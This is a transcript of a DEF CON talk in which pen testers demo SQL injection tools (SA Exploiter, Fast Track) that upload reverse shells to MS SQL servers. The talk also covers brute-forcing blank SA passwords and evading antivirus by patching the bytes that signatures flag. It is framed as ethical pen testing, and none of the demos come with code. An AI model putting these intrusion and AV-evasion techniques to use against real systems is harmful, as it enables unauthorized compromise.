 What's going on there, Defconn16? I need some audience participation. Get some shirts. Hey, this is a couple of shout outs real quick. We want to obviously thank Defconn for having us up here. Specifically DT, it's been a long time, but we finally made it up here. Appreciate you guys having us. Great party yesterday. Had a number of interesting events happen. So obviously Las Vegas with happens here stays here. Here's what we're going to talk about, guys. We're going to talk about some cool stuff that's coming out and some tools released talking specifically about what we can do around SQL injection. We're going to talk a little bit about how we're able to bypass AV and do some uploads to some packets and put some tools up on the server and see us compromise some stuff. Great talk before us. We're going to introduce the panel here. I'm Ken Stasek. We're all from Secure State. Next to me is Dave Kennedy, Relic, author of FastTrack. FastTrack, anybody use it? In backtrack. All right, all right. We're going to show it. If you haven't used it before, we're going to show it. Obviously Dave's got a number of years of experience good at automating the security process and putting some things in place to allow us to efficiently do our job. Next to him is, well, actually I'm going to go in order here, we've got Scott White here. Scott, his expertise is web application security. We're going to see a lot of what he's brought through with his essay exploiter. And then we have Andrew Weinheimer. His expertise is obviously network and staying off the list. If you guys know what the list is, full disclosure there. Andrew wants to stay off that list. So if you're interested in that, come see Andrew. We're going to talk about a case study here. And as I said, Secure State, we're an information charity company based in Cleveland, Ohio. What we do is ethical pen testing. So what you're going to find is we do about 120 different pen tests a year for different clients ranging from government all the way to commercial. In this specific example, we brought Fortune 100 organization. And through the course of hacking into the organization, we've developed some tools that we thought would be pretty cool to release. And we're going to actually be demoing those tools and releasing them at the end of this presentation. The case study is going to actually walk through how we use those tools, how we developed them, and then specifically what you can do to use those ethically in your own course of penetration testing. All right, when we do the demonstrations and testings, the first case study is going to walk pretty quickly through the tools. We've seen a number of different presentations. And what we like is when we can do some high end, fast demonstration of the tools. And then if you're interested at the end, getting more in-depth and more detailed to the tools themselves, we can actually go through that. And then at the end, if you haven't seen Fast Track, we're actually going to do a wrap up and show some Fast Track with Backtrack embedded in that, obviously. What else we got there? Has anybody saw the topic with Kurt? Great topic at NCLM is dead. And we had literally hours of fun talking about the Squirtle and the way that we were using it. So I want to just give props out to that. Awesome presentation from Kurt. And without further ado, we're going to start the live demonstration. Thank you. Hey guys, how's it going? So a whole point of this presentation was to go over what we were doing for a Fortune 100 company. SQL injection attacks aren't really a new topic for most cases. But we did some new interesting twists here that we're going to release at DEF CON that were pretty interesting for us to do. And what we're going to do is I'm going to walk through each one of the tools that we used, how we did it, how we got around certain challenges. We're going to go through and see that we get picked up by AV. We're going to go ahead and bypass that. It's pretty much trivial for you guys to know to bypass any type of AV nowadays. So we're going to walk through all that good stuff. So without further ado, I'll kind of load up the site here that we had. So we got a site here that we found. And what we ended up doing was the first thing we go after when we do penetration tests are we start looking at web application layers. Because web applications are generally the pretty easy way to bypassing the systems. A lot of companies invest in firewalls and all that great stuff. So our most avenue of attack is through the web application layer. And so what we did was we started looking through different web apps and identified some SQL injection. And for those, you mean SQL injection, some simple stuff here? You know, hey, it blows up. We got some SQL injection here. We know we're good. We know it's there. So from there, we decided that we were going to see if it's running under DBO or SA. And it was. And from there, we decided to start going and attacking the underlying operating system. How many of you out there have heard of XP Command Shell? Just a few. I'm disappointed in you guys. What we're taking a look at here is the SA exploiter. Started this probably a year ago to help automate SQL injection full compromises through XP Command Shell. Once we've identified that a web server or the SQL server is executing queries under, with excessive privileges, what we do is this tool just automates typing. This thing is a string generator. And what we're going to do is we're going to take this to deliver our payload. What's our payload going to be, Dave? Some nice Metasploit shell code right here. Anybody ever heard of Metasploit? What's that? Mutas. So a little copy and paste. You can do Control-C, Control-V, your elite. Click that little format shell code button. Make some pretty things over there. Use that binary payload checkbox. Generate our injection string. That looks pretty complicated, too. So, Dave, then what do we do? We copy that, right? Some more Control-C, Control-V. What was our Metasploit shell code that we had there? Metasploit shell code was just a reverse TCP shell that we used in Metasploit. And copy and paste it. And what's unique about this is we'll get more into detail once we start talking into the visual tools. But we successfully figured out a way to bypass the 64K bit limit through debug. So it's a nice interesting thing that we'll be showing you guys here in a second, but we'll do that more in depth here. So basically it's a Windows reverse shell. Straight off of Metasploit.com. Copy, paste, click a button. Check a checkbox. Click Generate, copy, paste. Paste, put something in for the password. Say go. Waiting. This part's a dead time. So I think I'm going to start taking my clothes off here, right? Wait, wait, were you guys here for the shirt or taking my clothes off? I couldn't tell. Don't do that. Oh, what is that? Yeah! There's the shell. Shell number one. Anybody see that? That was an elite hack. Control-C, Control-V. Hard, huh? All right, so in this pentast, what we did first was we created a customer reverse TCP shell using assembly. And what we did was when we injected it into our system that we're trying to attack, it was going to be picked up by AV. And we'll go ahead and demonstrate that real quick. Not to mention, when we deliver our payload, there are no egress connections. We don't use TFTP, FTP, anything like that. And I'll talk about that later. So we can be dropping our Trojan or our keylar, or whatever it might be, onto the server, and it never connects back to us. I mean, we showed that it could, but the payload delivery method is not required to do that. OK, so what we did here is we have our custom exe. Basically, we can deliver any custom exe we want, along with Metasploit shell code. So I leave the options on this tool up to you. Whatever you want to do, it doesn't matter. I mean, Metasploit, I don't know what you want to do, what your goal is. Different pen tests have different things that our clients want. So we leave that in your hands. So this is a custom reverse shell. And EVG is up to date. And as you can see, the signature is right here. It was updated today, 8.10 at 1.49 PM. So we're out of date. It just couldn't connect to the connection manager. So right now, we're going through and trying to deliver our payload. And right now, it's dropping onto the system. And we'll show you detail steps on how it's doing all that, but just kind of walk through it. And as it's going through, it's waiting for it to execute. It takes a while. And we also have our command shell running here. Netcat. So AB didn't pick it up. G is the right exit. So here we go. Some more hard stuff. You can point, click a button, browse, find your own executable. That's about all you have to know. Again, that ultra elite copy and paste. All right. So right now, we're delivering it. We've got Netcat listening. And hopefully, ABG picks it up here. And we'll scan it too while we're waiting here just to show you that it should be picked up. So you can see here, it does detect a malware infection found one. And for some reason, it's not going to get detected on the other side. But anyways, most instances, it would get detected by ABG. For some reason, it's not picking it up. We'll go ahead and just manually scan this thing real quick. So during this case they did in this pentest, we were getting flagged by antivirus. So if you guys were getting flagged by antivirus, what would you do? Or you could just use a tool that we developed to get around it. And so what we did was we figured we took all the antivirus signatures out there, like ABG, Symantec, McAfee, Nott32, Kaspersky. And we created a smart database out of it. And through there, what we do is we look at what antivirus signatures are flagging on a specific binary. It's actually looking at what antivirus is detecting. And then it makes changes to that binary and automatically rewrites it for you to completely bypass it. And it starts off very simple. Just looking at instructions, looking at different characters that it might go. And if it fails, it keeps going further and further until it does a custom packer or various encryptions. So what we ended up doing from that perspective is this tool that we're going to be releasing, it goes through and automatically detects that. And I'll go ahead and show you that right now. Generally, when we do our pentests, we don't use automated tools. I mean, we do use automated tools, but for a lot of times we find that writing our own is a lot easier. So we go into this tainted folder here. You can see we got Netcat, we got PWDump, we got our customer reverse shell here. So we're going to look at this reverse shell. We're going to scan it with AVG. That pops up as infected. We do the same thing with PWDump infection. And then we got Netcat. Thank you, AVG, for flagging a very legitimate tool. Ha, ha. Netcat's taken. So what we're going to do is we're going to take our tool. And really, it's a brute force here. I mean, we're looking at what AVG is flagging and we keep trying different patterns. So what do we got to get around right now? We're going to go ahead and run that. So you select AVG. And what are we going to do? We're going to do the reverse shell. Hit 1. It's looking for instruction signatures. And if you look at what it's going to find, and you see the instructions found, it found that AVG specifically flagging on the offset 00400158. So it's automatically going to recommend to you to change it to get past it. So do you want us to redo the actual binary of AVG? So we're going to go ahead and run that. So do you want us to redo the actual binary itself? Sure. Yes. Copy. Again, another one of those extremely hard things to do. Can you type numbers? All right, so scan with AVG. See here, no viruses came back. How about that? Like I said, we're all about automating. At the end, you're going to see the big one. So now that we've successfully bypassed it, we go ahead and deliver our payload like you saw before. We're getting a reverse command shell out to the system. Now what we're going to do is, since we are talking about malicious code being on the system, what we had to do was, and to the client, was go on there and say, well, hey, how do I go on here and look at what's going on? So we're going to go ahead and execute our command shell again through Automator. And we'll walk through all the functions. But I mean, you can do things like turn on, XP command shell, if it's disabled. Yeah, we'll take a more in-depth look at this later. So the client really wanted to know, if we were breached, walk us through what you do to find it. They just didn't understand. And they had no idea where to start. So we helped them out with this. And while Dave's getting us set up here, they really wanted to understand to really push it to the upper level execs what can be done, what we're able to do, and also educate them at the same time. Very important during pen test is the knowledge transfer. So our clients understand what we're doing, what the importance of it is. And if they can do control C, control V, they can do the same thing. So we're just going to wait for the established connection to hit again. And then on this side, we're going to go ahead and get our tools ready. Now we've created a new tool called DLL Spy that looks at what DLLs are being used. It's actually pretty simple. But what we're going to do is just look at a very high level of what we'd be doing. So now we've got a command shell. Again, we have established connection. So what's the first thing someone's going to do? And that's that. So you can see we've got an TCP established to this person on 4444. All right, great. Let's take a peek at what's going on TCP view. All right, it looks good. Standard. This is kind of interesting. System process zero. So what we're going to do is open process explorer and try to look at that process. It's not showing up. It's weird. If you look here, how many command shells do I have open here? I have one. Showing at two open. Kind of strange. So that looks legit. Let's just go into command.exe. That's kind of weirdness. It's hooking into moot.exe. So there we go. We got something weird. So we can do DLL Spy. Browse that directory. You ever heard of a legit Windows program called Moo? So we see it's using a bunch of different types of DLLs. And in those, we have a lot of network sockets. We got a bunch of different things that it's connecting to. So we know for sure this is probably our malicious code. So being able to detect it, good. Great stuff. All right. Let's go into the actual features itself of this tool. And FastTrack itself, when we go into FastTrack itself, it really is an automated way of breaking into SQL injection. What you guys will see is we can automatically scan subnets, crawl websites, look for SQL injection, automatically attack it, try fuzzing the actually bypass, and do string completion on SQL injection, and automatically give you some really cool stuff, including some reverse GUIs that we'll demo. But we're going to get into Scotts tool here. We're going to go through each one of these, kind of walk you through what you're doing. All right. So we're going to take a look at the SAX player here. First of all, there was a lot of goals within this tool. We'll talk about those. But the current state of SQL injection tools, I really don't like it. Got all these tools out there. Everybody says they work. Most of them don't. Everything automates it for you. Well, there's more to it than point and click. This tool is made specifically for exploiting Microsoft SQL servers, running under SA, or those privileges, DBO, as some of you may know. It kind of made me mad with all these tools. I don't let all these things that, you know, we're going to automate SQL injection. We're going to do that. It does everything for you. Well, a lot of the things, I mean, my tool collection is rather small for SQL. I choose to do it manually because I find that's a lot better and that this tool is geared towards that. I would like to mention SQL Ninja. It is probably one of the best ones out there. Unfortunately for beginners or script kiddies, whatever you might call yourself. It's only for Linux. It's a command line. It has features like file transfer and it doesn't, it uses Netcat to do that. What's wrong with that? What if we have egress filtering? That's going to be a problem. I still want to get my stuff up there. I find something that's going to stop me. I'm going to get around it. So hackers are persistent. And plus, you know, Netcat also gets flagged by 90% of the antiviruses out there as well. So when you drop a Netcat on there, good stuff. So like I said, most tools try to automate things. I still believe manual is the way to go. You have more control over what you're doing, not as noisy, things like that. After doing a whole lot of typing, like I said, this is why the tool came out. The tool that you're looking at is a string generator. That's all it is. We just generate the engine string. That's the main function of this tool. Why is it nice? We don't have to remember all the SQL syntax. There's obviously a lot in there. And not everybody's an expert in every area. My original plans were to do everything in SQL Server on memory. Microsoft has some nice limitations. For example, you can have up to an 8,000 character string literal, and that's it. So why is that an issue? You can obviously see that we have a whole bunch of other things on here. So ran into some roadblocks, went back to square one, and changed the plans. There's a lot of issues with double and triple nested, single and double quotes, things like that. Again, why we want to be all manual. Due to the requirements when I was writing this tool, we are ethical pen testers. Our requirements are a lot more stringent than your malicious hackers. With our databases and our attacks, generally our clients, if we're doing this in a production world, they want to keep the integrity of their database. So what's that mean? That means as a pen tester, I cannot update, delete, modify any kind of data. You have to create store procedures or tables or things like that for a lot of the known ways that are out there. So I said, well, we're not going to do that. So a couple of the requirements. Absolutely must not require an egress connection using FTP or TFTP. Why? Well, that's a known way that people do it, and we want to be better than that. It must be easy to use. We already showed you. If you can do control C, copy paste, you can do it. Within Windows Debug, we already talked about that, you can convert hexadecimal stuff to binary. Like Dave said, we have a 64K limit with that. How many people knew that? Not very many. Who likes limits? Not me. 64K, no longer. We're going to show you how to get around that today. So our file transfer, so long Windows Debug. And generally when you're attacking systems, generally when someone compromises the system, they throw a stager on there, which does a get to more files or does some sort of file transfer like SQL Ninja does for file transfers back and forth via Netcat. With this new attack, we don't have to do any type of things like that. It's not using any type of egress connections or file transfers. We do it all through SQL. So it's pretty slick. Like I said before, everything... I like to leave the options at your hands. I don't like these tools that go out there and do something and I have no idea what it's doing. So all the options on here are for your convenience. Things like Metasploit. We have all that shellcode out there, or the shellcode generator. I don't care what you do. I leave the option up to you. We have Metasploit out there, so let's utilize it. So I did. What we're going to talk about next is how we actually transfer our payload over. This is a new technique that, to my knowledge, nobody else has done. This helps us bypass that 64K limit. Pretty much what we do is we're going to use Windows Debug to transfer over a small executable. It was about 5K. And we're going to use Windows Debug to put that over there. Pretty much you echo hexadecimal representation of my custom file that I wrote, and we're going to get that over there, and we're going to have a custom binary over on the system that's 5K. What does that do? It's a hex to binary converter. What does that mean? What we can do now is echo as much hexadecimal stuff we want to into a text file and tell it to go at it, and it'll convert all that to binary. But there's no limitations. We don't have that 64K limitation. So, first thing we're going to do is echo text into that text file, use Windows Debug to get our custom converter over there. We're going to echo the custom, or excuse me, our hex values for our payload, whatever it is, whether it's your custom Trojan or your Metasploit code. Pretty much we just put Metasploit code in an EXE stub and a wrapper. And whatever it is, we're going to echo that hex over into the text file. We use our custom converter to convert it, and then we can execute it, do whatever we want. So, let's show this. We're going to use Metasploit shellcode. Again, copy, paste, format shellcode. Just preps it for me. Any custom binary interpreter VNC inject, Metasploit VNC inject, interpreter, council, anything you want to at this point. Again, there's no limit. If you want to upload two gigs, it might take an hour for it to compile it back to an executable, but at this point, there's no limit. Yeah, and these colors are a little off for some reason. They don't look like this normally. So, we want to use the checkbox here, use binary payload, because we did that over here. And we're going to say generate. And we can see that there's a lot of stuff going on here. Basically, all we're doing is piggybacking commands onto the SQL server. A whole bunch of them in a row. We really don't care how long it takes, because it's all going to be queued up. And what Scott's demonstrating now is the post method. Obviously, if you're using get, you're going to have to split this up a bit. When we show Fast Track, it does Automapid Attactive using post get, and splits it up into chunks so that, you know, you can get around any post or get restrictions. Sorry, not a Mac user. Who lost? So, we have a reverse shell code here, and we need to get netcat listening. Okay, so now we have netcat listening. Say go. You look over here on our server, I mean, it's going to spike up quite a bit. Now we're using 100% CPU, and that's when it's doing the debug conversion, as well as when it's taking all of that hexadecimal code and converting it back into binary. And there's the shell for us. So copy and paste Metasploit shell code, SQL injection, it's up to you. To my knowledge, no other tool can do this. SQL Ninja can do interpreter and VNC, DLL injection. But to my knowledge, nobody else can do this. So that's how you do it with Metasploit shell code. Now we're going to show you how to do it with Custom EXE. Okay, this is our custom, reverse shell that we wrote. Use binary, payload, generate. Just need to add a port and an IP address. And we see go. And our server is converting it. Sometimes depending upon the size of your payload, it can take up to five or ten minutes. I mean, if you put a huge file up there, that's going to be a lot of I.O. for the system to do. So whether we use Metasploit shell code or your own custom EXE, this shows you pretty much what the capabilities are. There's other options within the tool. These ones are pretty much well known. We have options to turn on XP command shell. If you believe it's turned off. We can add a local user account. Pretty much automate a lot of things we might want to do. Disable firewalls, antivirus. We can connect back via FTP. Pretty much automates SQL injection running under SA. The main features that we wanted to show you, though, was the Metasploit shell code and the binary payload transfer. There's other options to it as well. The blind-fuzzless generator. If we have things being displayed back to the screen, we're not really sure what the different types of data are that are being presented back. Basically, it's just going to generate a fuzz list with different types, and you can put that through, like, Web Scarab, through the fuzzer in there and go through and see when you get the correct data back. Pretty much we're just automating it. There is an auto-exploit option if you have it in the GET request, depending upon the web server. The GET request are going to have limitations for how long they're going to be, so that's going to be... You're going to have to split up your injection, which could be very long, as we can see here. And Dave and Andrew will talk about that later. All right, so that's the SA exploiter. Towards the end of the presentation, we'll let you know where you can get that, and it'll be available to download to use ethically in your own pen test. All right, who wants to see some really crazy stuff right now? I'm going to wake you guys up. Come on. All right, so for you guys that don't know FastTrack, really what it was was I decided to learn Python a while back, and it was more of a C sharp guy. And thanks to Mutz, I wish I didn't learn Python because my wife hates me, and I'm up coding it late nights of the hour, so especially thanks to him for that. But what FastTrack is, I really try to automate a lot of different types of attacks out there and some unique ones. I originally came up with the attack for mass client attack using Metasploit, and Egypt from Metasploit has now created the auto-pwn feature for that. So there's a lot of different types of attacks out there that you can do with FastTrack. Specifically the one that we're going to do here, what you just saw in Scott's tool, we took that one step further and really automated pretty crazy stuff. So what we're going to do, and what you're going to see, we're going to scan a subnet for web servers, looking for web servers out there. So I'm going to identify them, crawl them, look through the whole website, every form parameter trying to see if it can get a correct SQL syntax. We can do both error and blind-based SQL injection, automatically inject, and get us some reverse shells and some reverse GUIs. Here's the syntax. I also built a front-end web server for it so that, for you guys, I just want to point and click. We can also do that, and I'll show that towards a little bit later. But as we're seeing here, we're running FastTrack, we're running the SQL component on it. We're using an error-based SQL injection, we'll demo error-based in a few. That's the IP address we're attacking, and we're using a Metasploit VNC inject using the Shikati, Gay, Ni, encoding. Does anybody know what that stands for? In Japanese? There is no hope. There are much to see. And we do a little bit more different things here. So once we're calling the site and once we identify form parameters, we automatically start attacking them. Under SQL SA, we automatically try to elevate our privileges. We turn on XP command shelf. It's disabled. We turn off depth. A bunch of various other things that we try to do. Nanj, do you want to explain what it's doing here? So basically right now, as you guys can see, it's calling the website that he entered. Right now, we're actually looking for the href tags inside the HTML. Some of you are probably wondering, what happens if you have URLs that are in JavaScript? Right now, we don't have that functionality added. Before we release the final version, we will add that. Keep in mind that this tool is in beta version. So when we release it to the fast track, we're expecting a lot of feedback. We're expecting bugs. So we need that feedback because before we release the final version, we want to make sure that we get everything worked out. So right now it's calling the entire website. Looking for every single URL that's branched off the website. Originally, we're going to do the nsa.gov, but we thought we'd get a lot of trouble for that, so we decided not to do it as far as a fake website. But right now, we're just doing a fake website that we created. And keep in mind that if you're scanning a website such as WebShots or something like that, some huge-ass website, we actually allow you to put a depth parameter in our spider. So if you don't want it to take two or three days to spy on your entire website, you can add a depth parameter of two. Obviously, you won't get the entire website. But if that's what you're looking for and you don't want to take a long time, we give you that option. Just finishing up here, we decided to do a very long site for some reason that would allow a lot of dead time in the middle of a presentation. So... Who wants a t-shirt? There we go. You only get one. There's only one per person here. Hey, nice hand. Nice hand. So, it's still crawling again. It could take some time, depending on how large the website is. Again, you're going to want to manipulate the depth parameter a little bit to speed things up. And at this point, we don't really have to do anything. I mean, you just let it run. Then it's going to do everything, attack it, try to finish the strings for you and do everything else to that effect. Scott said he likes to do the manual attacks. I really don't. I'm lazy. As much as I can automate shit, that's what I'm going to do. Dave and I both created this tool. Basically, you put in the URL, you let it go, find SQL injection. You want to exploit? Yes. You got a shell. So, as you can see here, we found SQL exception and text pass. After this, it flies off the cedar pants. It's automatically elevating our privileges to SA, if not already. It's turning up depth. It's enabling SP Command Shell. And then here, we're using a get request. It's all dynamic. So, regardless of what payload you put in there, if it's 10 megs, it's automatically going to split it up into chunks so that it does get out to the server using get request. So, as you can see here, we're taking our 64k debug bypass, the hex to binary payload that we initially used in Scott's talk. And we're going through and chunking it up into four different chunks. There's a custom text file that right now we have the different SQL injection parameters. So, you know, like a single quote, but that's totally customizable. Whatever you guys feel that, you know, to identify SQL injection, you can add it to that file. So, right now, what's happened, basically, is it found the URL that has SQL injection on it. It's delivering our windows debug bypass payload. Once it gets on the server, it's going to compile it, and then we can actually pretty much deliver any payload that you guys want. Right now, we actually have three custom ones inside this module. We have the VNC inject, Metasploit interpreter, and then our customized, reversed shell. But, again, it's totally customizable. You can put any payload in there you want. It may take some time, but it launches the next term window right now. And what we're doing is we're injecting the interpreter inject right now. So, if you guys are really interpreting Metasploit, pretty nice way to use it. Do pretty much whatever you want to at this point. So, because here we got it. So, okay, this is a completely automated tool. Dave and I developed this tool with the mindset we wanted to be as automated as possible, as scripted as possible. CIS can run this tool if he wants to. Whatever it is. Basically, again, you type in a URL or a subnet. If we use a subnet option, basically you have the option to put in a class C or whatever it is. And then what we'll do is actually go through the entire class C looking for web servers. After it finds the web servers it will present the user with the list. The user then has one or two options. It can scan the it can actually scan the entire list that it found. So, if you know you put a class B in there and it finds 500 web servers then obviously you can go through each single one and it will scan them, look for SQL injection, finds it, allow you to exploit it. So, those are basically two options. Scan a subnet or single URL. Right here we're going to do the actual GUI itself. So, we'll get a nice little graphical user interface in the back end. The reason why we wanted to release the Windows GUI is because we know everybody at DEF CON uses Windows. So, we wanted to release a nice tool for that. I'm so getting beat up at this. I wonder how many people have just offended. So, really what we did, we didn't invent the wheel. We know we're using a known exploit but what we did do is something that we think is pretty cool. Something that we haven't seen yet. I mean, again, completely automated, no manual techniques and honestly, it will find SQL injection. Hey, guys, let's give it up. Did you see that? What do we have here, Dave? Nice command, Sean. You see, I'm not switching over anything. This is a window right here for the actual 1N. This is the actual VNC as you can see up here. Full remote desktop automated. Does it get any easier than that? For those of you that listen to, or know lolcats, I've been having a little lolcats moment there so I has been poeing on those. And I think what we forgot to mention, too, when the find SQL injection, the way it's doing it is obviously it's injecting the form parameters, submitting. If it comes back with the SQL error message, you know, like a SQL ODVC message or something like that, we're using regular expressions on that page to find SQL injection. So, for those of you that want to use a web interface like men's exploit, you got SQL opponents right here. You got blind based, air based, whatever you want to do. We won't go through the blind base because that's going to really put some dead time in. What we're thinking about doing is adding time-based data so that we can actually validate that the blind SQL injection is working properly. At that point, it would initiate the attacks at that point. So that should be hopefully put into the next release there. But as of right now, it just kind of really brute forces blind SQL at that point trying to look for anything that's shot in the dark. And before we release the final version, right now it currently can't do HTTPS or SSL obviously. So we'll add that in before the final version and we're actually going to add in a login functionality. So if the page has a login potential and you want to continue spidering after you're an authenticated user, we'll add that in as well. So all I did was I entered all my stuff and it's spidered it. I found a single website. It's going to go ahead and automatically crawl it and go through all the various things like that. Once we've finished the crawling, it's going to go through and do everything that we did. And as you can see, that is through the web interface. So it has a bunch of different options you can use as interactive mode where it's kind of like a menu driven. It has the command line mode so and obviously the web viewing mode. So we showed those two real quick and what's going on with FastTrack. I'll show you guys now the AV and what we're doing. We'll go pretty simple at this point. We lost our reverse engineer, John Melvin, if you saw that he was supposed to be on this topic. He's unfortunately getting married so he didn't make it to the DEF CON. I'll try to keep a spot here. So a lot of antivirus signatures out there are really pretty basic in all forms. They look for specific things in files to flag on. And those are what you see on the signatures. We did a review on Nod32 that we completely destroyed it and went through it. There's really nothing out there at this point that's really getting past it. It's pretty trivial at this point to bypass it. So what we wanted to do was create a tool that automated it for us so that when we're doing a pen test we get nailed by AV, we write a custom payload, it automatically goes through it. So I'll show you what it's doing and how we're doing it. So if you look at our folder here, we got a folder here called Tainted. And those are the ones that it's getting flagged on. So you got the reverse shell PWDump and Netcat, which we won't do PWDump since it's not getting flagged. But like PWDump for example, ABG was looking for certain characters like passwords. So all you need to really do for that to bypass is change all the S's with dollar signs. Wow. It shows you how really basic these are. I'll send it to Ollie real quick. We'll load our Tainted reverse shell like it's blasted. And this error right here means that it's already packed. And in most cases, you know, this is the type of error you're going to get when there's a packed binary. So from here, the first signal is doing it and especially in a packer is it's jumping through a specific address. So we're going to go to that address that it's jumping to. And we see these two flags here. Now our tool, what it looks for, is what specifically is AB flagging now? Why is it stopping it? It's specifically stopping these two functions right here. It's flagging on these two. So all we need to really do is change these around to be something different than ABG or Symantec or McAfee's going to find. And before we came here, we ran it through VirusTotal and after these changes to it, it got through McAfee, Symantec, ABG and Chris Bursky. So those are pretty good ones out there to get around, right? So all we're going to do here is we're going to change this to moveEBX instead of ESI and then change this to be moveESI to EBX. Switching them around. All we're going to do, we're going to save this file. So here's our reverse shell that we just saved, the new one, right? So we got reverse shell.exe and we'll go to the def container folder real quick just to run a scan against it. Just to make sure that was at what I was in fact using. Malware Malware detected. We go to our new one that we just wrote on the C drive. Malware not detected. Now there's a bunch of different things you can do. This is really basic, but our tool automatically gradually gets more and more complex as it goes along. Thank you. Actually, one got me in the side of the head there. That was a must, wasn't it? Dave, what's the lemon party? All right. Back on to our topic, Gary. It's a game of bingo gone horribly wrong. So we took a look at reverse shell.exe. Now we're going to look at what does neck get flagged at? And like I said, it's really trivial to bypass these things at this point. So what our tool is going to do at this point is the first one to found was instructions. You know, I jumped to a specific address and all we had to do was change those two values around. What happens if you have to do something different? So we're looking at our tainted folder here. We're going to look at neck hat. I'll just demo that the tool is actually working too. I forgot to mention that. So reverse shell.exe we'll do rewrite something. A lot of times it doesn't work. So we'll just do 10.21.25.2 4444. So on the neck hat side of things you see here it didn't find any instructions that it could change that AV was flagging on. But it was looking at immediate constants used by AV that's getting detected. So you look here, it's jumping to this specific address here, 0401178. Well, there's also other instructions inside neck hat that does that same jump. So what our tool automatically detected was why don't we just rewrite this specific one as flagging on and move to another jump that is jumping to the same address. What is that going to do? Let's find out. And just so we know we'll go to the Defcon folder like we did before. Go to our tainted. Man, my head really hurts now. That was a good one. Someone was really angry at me. At least it smells good. Yeah, it smells like lemon now instead of a bunch of guys. That's kind of nice. Okay, so we see here that the spireware was found. So what we're going to do is open up Allie again. Go to neck hat and we're going to go to that address that's specified there. So we'll go through this one more time so I can see what actual address it is there. I totally forgot. The lemons, I swear. So flagged on 0401178. All right, so right here you can see 0,0. All right, so here we see moviecx and if you look at where it flagged on a neck hat it says that it flagged on jump short right here at offset 1137. So we go to 1137. You see here it's jumping right here. So we need to find another one that's going to 1178 that we can just change around. So if you look here we got another address right there that looks nice and tasty for us to use. So we're going to change that to 114C. Do the same thing we did last time. So we got a neck hat that you see right here. No more AV. And again, these are all really basic attacks that you can do. I mean there's, you know, polymorph or encryption and packers and all this crazy stuff out there you can do and it will eventually do that if it does get flagged. But at this point to be honest with you, there isn't too much out there that's not going to get flagged on in the simple steps because they pretty much suck. Sorry, if there's anybody out there for me and those companies, I apologize. What I'm going to do now is show you some nice little functionality features of FastTrack that you guys can see out there. It's pretty neat stuff. It is on the BackTrack CD. You can also download it. I have written a bunch of installer for it as well as a Gen2 installer and also a vanilla installer so if you're using, you know, something out there like Slackware or anything else, it automatically detects it and installs it for you. Oh, in addition to these attacks that we demonstrated here are no different on a Windows Server 2008 box using SQL Server 2008. We have successfully tested it on that as well and we're actually able to get interpreters to work no problem so that was pretty cool and interesting find that we did see. So, you know, Server 2008, SQL Server 2008, not a big deal. Alright, so what we're going to do is a little FastTrack here real quick. We use the GUI. And I can't use the GUI because I did write it, so don't catch me. I'm just using a Windows 2000 server because it's the only one that I didn't have but it does some pretty cool stuff. If you look here, here's my address, 55.6. You do things like, if you're anybody familiar with the auto-pwn feature in Metasploit you know, you have to type in all those commands like dbcreate, you know, dbmapp. So I kind of automated that real quick and we'll just do a quick port scan of that. Port 135, 445, 10.201.55.6. And all you do is hit enter. It's on a Mac and you do everything for ya. On a Mac you port scan it since the host is down so let me do a PN real quick. It does really work I swear. Alright so we'll move on to SQL Brooder. So for those of you that are doing pen tests, our main point of entry when we go into companies and it's so simple is companies that, especially those that load thin clients through SQL, they install the SQL Server 2000, 2005. They put blink passwords or really easily guessable passwords on port 1433. The essay password is blink by default in 2000 and earlier, FYI. So I mean what we do is we just do mass scans and fast track and you can just do subnet ranges to test for these and it looks for essay accounts and on Mac you brute force them and it gives you shells back to them. So you can see here the following SQL Servers were compromised. They found a blink password, which one do you want to jump into? Jumping into a shell. Now if you're using SQL Server 2005, it automatically detects if it's disabled and re-enables the XP command shell for ya. It gets ya full access back into it again. So it gets ya full root compromise on that. Now what's been incorporated is the new Metasploit which is from Egypt was the auto client phone feature where it sets up a fake web server for you and then as soon as someone connects to you it automatically starts running a brute force of exploits against the system. It's kind of like impact on steroids. What we're working on here is and it's going to be released in the next fast track version is it automatically does we wrote a custom EtterCat filter and what it does is it poisons all traffic going out 80 and as soon as someone goes to browse the website it automatically redirects to you and it's doing a whole bunch of attacks against ya. It should be pretty slick. So we're listening on our specific port and what it's doing is it's loading the interpreter session right here and so all we need to do is have someone connect to us on 80. And so in an EtterCat type of attack it would definitely do that. And everything breaks for the demonstration. We were on a t-shirt so that's our last call. Who wants a lemon? I'll take hers. All right guys, that was it for us. I appreciate your time and that's all we got. Thanks. One last thing to mention. The SA-Exploder tool can be run on Linux. Use wine or something like that. And Dave, where can we get these tools? So if you go to our main website security.com and there's a free tool section on the very bottom there. It should be available tonight. Thanks guys, I appreciate your time.